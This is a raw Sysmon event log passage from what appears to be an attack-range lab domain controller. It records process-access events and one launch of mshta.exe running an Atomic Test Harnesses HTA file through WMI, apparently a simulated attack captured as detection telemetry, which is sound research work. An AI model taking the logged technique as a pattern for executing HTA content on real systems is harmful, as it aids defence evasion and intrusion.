16:00:02.053{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000028377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.064{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000028376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51